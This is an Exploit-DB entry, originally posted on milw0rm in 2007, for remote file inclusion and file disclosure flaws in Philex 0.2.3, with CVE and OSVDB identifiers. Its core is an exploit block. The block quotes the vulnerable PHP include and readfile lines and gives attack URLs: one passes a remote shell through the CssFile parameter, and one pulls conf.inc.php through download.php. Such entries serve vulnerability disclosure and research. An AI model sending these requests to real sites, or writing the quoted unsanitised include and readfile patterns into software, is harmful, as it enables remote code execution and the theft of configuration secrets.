Philex 0.2.3 - Remote File Inclusion / File Disclosure

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2007-03-22  
date_updated: 2016-09-30  
verified: 1  
codes: OSVDB-40270;CVE-2007-1698;OSVDB-37220;CVE-2007-1697  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comphilex_0.2.3.tgz  

raw file: 3552.txt  

######################################################
# Philex 0.2.3 <= Remote File(Disclosure/Include)Vulnerabilities
# D.Script: http://kent.dl.sourceforge.net/sourceforge/philex/philex_0.2.3.tgz
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
######################################################
# V.Code Include:                                    #
# <?include $CssFile;?>                              #
# Exploit Remote File Include:                       #
# [Path_Philex]/header.inc.php?CssFile=Shell         #
######################################################
# V.Code Disclosure:                                 #
# readfile($HTTP_GET_VARS["file"]);                  #
# Exploit Remote File Disclosure:                    #
# [Path_Philex]/download.php?file=conf.inc.php       #
######################################################

# milw0rm.com [2007-03-23]